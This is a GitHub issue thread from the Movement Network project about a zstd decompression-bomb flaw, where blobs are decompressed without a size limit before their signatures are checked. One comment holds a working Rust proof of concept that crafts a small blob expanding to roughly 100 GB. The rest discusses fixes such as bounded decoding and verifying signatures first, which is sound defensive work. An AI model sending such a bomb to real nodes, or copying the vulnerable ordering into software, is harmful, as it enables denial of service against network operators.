movementlabsxyz / movement

The Movement Network is a Move-based L2 on Ethereum.

(OTS) Zstd Bomb Blob #876

Open l-monninger opened 5 days ago

l-monninger commented 5 days ago

Summary

A malicious user may post a zstd bomb (a small compressed blob that decompresses to a huge buffer) as a blob on the movement Celestia namespace. Although blob data is checked to be signed, zstd decompression happens before the signature checks. Decompression is done with the zstd::decode_all(blob.data) function, which places no limit on the decompressed size of the blob. Even with Celestia's 2 MB blob size limit, we were able to produce a PoC that uses approximately 100 GB of RAM on decompression.
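
Schematically, the problematic order of operations looks like this (a sketch with illustrative names, not the actual movement code path):

```rust
// Illustrative sketch of the vulnerable ordering; `verify_signature` is
// a stand-in for the real check, not the actual movement code.
fn verify_signature(_decompressed: &[u8]) -> anyhow::Result<()> {
    unimplemented!("stand-in for the real signature check")
}

fn handle_da_blob(data: &[u8]) -> anyhow::Result<Vec<u8>> {
    // 1. Unbounded decompression runs first: a zstd bomb triggers the
    //    huge allocation here...
    let decompressed = zstd::decode_all(data)?;
    // 2. ...before any signature is checked, so the attacker does not
    //    need a valid signature at all.
    verify_signature(&decompressed)?;
    Ok(decompressed)
}
```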

l-monninger commented 5 days ago

@khokho

mzabaluev commented 4 days ago

Should we impose some constant size limit on IR blobs, or should it be a chain parameter?

l-monninger commented 4 days ago

> Should we impose some constant size limit on IR blobs, or should it be a chain parameter?

Yes, but we also want to change the order of operations so that we check signatures on the compressed blobs. That way we know whether honest signers were involved.

Even with a size limit on IR blobs, we can still get bombed. But, later on, we could perhaps entertain slashing signers that bomb.

Ideally, we would also want a way to catch bombing behavior and ignore the offending blob. For example, I think you can use maxWindowSize() in zstd to accomplish this, i.e., set the maximum decompressible size, but I'm not sure.
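
In the Rust zstd crate, the closest knob is window_log_max on the streaming Decoder (it caps the frame's declared window, not the total output), so a hard cap on the decompressed size is still needed on top. A minimal sketch, with the limit value left as a placeholder:

```rust
use std::io::{self, Read};

/// Sketch of bounded decompression: stream the frame and refuse to
/// produce more than `limit` decompressed bytes. `limit` stands in for
/// whatever constant or chain parameter is chosen.
fn bounded_decode(data: &[u8], limit: u64) -> io::Result<Vec<u8>> {
    let mut decoder = zstd::stream::read::Decoder::new(data)?;
    // Optional hardening: reject frames declaring an oversized window.
    decoder.window_log_max(27)?; // 2^27 = 128 MiB window cap
    let mut out = Vec::new();
    // Read at most limit + 1 bytes so an overflow is detectable.
    decoder.take(limit + 1).read_to_end(&mut out)?;
    if out.len() as u64 > limit {
        return Err(io::Error::new(
            io::ErrorKind::InvalidData,
            "decompressed blob exceeds size limit",
        ));
    }
    Ok(out)
}
```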

l-monninger commented 4 days ago

@khokho, can you share your bomb so that we can write tests against it?

khokho commented 4 days ago

@l-monninger Here's the PoC:

```rust
fn zstd_bomb() {
    // MAGIC + frame header with max window size
    let mut b: Vec<u8> = vec![0x28, 0xb5, 0x2f, 0xfd, 0x0, 0x7f];
    let n_blocks = 0x530000;
    for _ in 0..n_blocks {
        // RLE block encoding the byte 0xff repeated 0x20000 times
        b.extend(&[0x02, 0x00, 0x10, 0xff]);
    }
    // Final empty raw block to terminate the frame
    b.extend(&[0x01, 0x00, 0x00]);
    // Check that we fit within Celestia's blob size limits
    assert!(b.len() < 0x1_500_000);
    // Decode the bomb. This uses up at least 100 GB on my machine,
    // after which it crashes.
    let res = zstd::decode_all(b.as_slice()).unwrap();
    dbg!(res.len());
}
```

mzabaluev commented 4 days ago

To me it boils down to two approaches:

  1. Change the format so that the compression layer is not applied over the signature, and use the signature to sign/verify the compressed payload (see the sketch after this list). Keep relying on Celestia's inherent limit to bound the size of compressed blobs.
  2. Impose a limit on the size of decoded blobs and pass it to the zstd decoder.
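
A rough sketch of how the two approaches combine, assuming a hypothetical SignedBlob envelope with Ed25519 signatures (the names are illustrative, not the actual movement types; bounded_decode is the sketch from the earlier comment):

```rust
use ed25519_dalek::{Signature, Verifier, VerifyingKey};

/// Hypothetical envelope: the signature covers the still-compressed
/// bytes, so verification happens before any decompression work.
struct SignedBlob {
    signer: VerifyingKey,
    signature: Signature,
    compressed: Vec<u8>,
}

fn verify_then_decode(blob: &SignedBlob, limit: u64) -> anyhow::Result<Vec<u8>> {
    // 1. Cheap check first: an attacker without a valid signer key
    //    never reaches the decompressor (approach 1).
    blob.signer.verify(&blob.compressed, &blob.signature)?;
    // 2. Decompress under a hard output cap (approach 2), in case a
    //    compromised signer posts a bomb anyway.
    Ok(bounded_decode(&blob.compressed, limit)?)
}
```
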
l-monninger commented 4 days ago

@mzabaluev Yeah, that's what I would say.

mzabaluev commented 3 days ago

We have the maximum block size parameter in the memseq configuration, but it is expressed as a number of transactions.

  1. Is this enough information to derive an upper bound on the size of an uncompressed blob? (A sketch follows this list.)
  2. This parameter governs the blobs that the node creates. Can we also apply it to blobs received from DA?
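
On question 1: only if there is also a per-transaction size cap; then the bound follows directly. A sketch with illustrative names and values, none of which come from the actual memseq configuration:

```rust
// Illustrative only: none of these names or values are the actual
// memseq configuration parameters.
const MAX_BLOCK_TXS: u64 = 10_000; // memseq-style cap, in transactions
const MAX_TX_BYTES: u64 = 64 * 1024; // hypothetical per-transaction cap
const BLOB_OVERHEAD_BYTES: u64 = 4 * 1024; // headers, signatures, etc.

// Upper bound on an uncompressed blob: usable as the decoder limit both
// for blobs the node creates and, per question 2, for blobs from DA.
const MAX_UNCOMPRESSED_BLOB_BYTES: u64 =
    MAX_BLOCK_TXS * MAX_TX_BYTES + BLOB_OVERHEAD_BYTES;
```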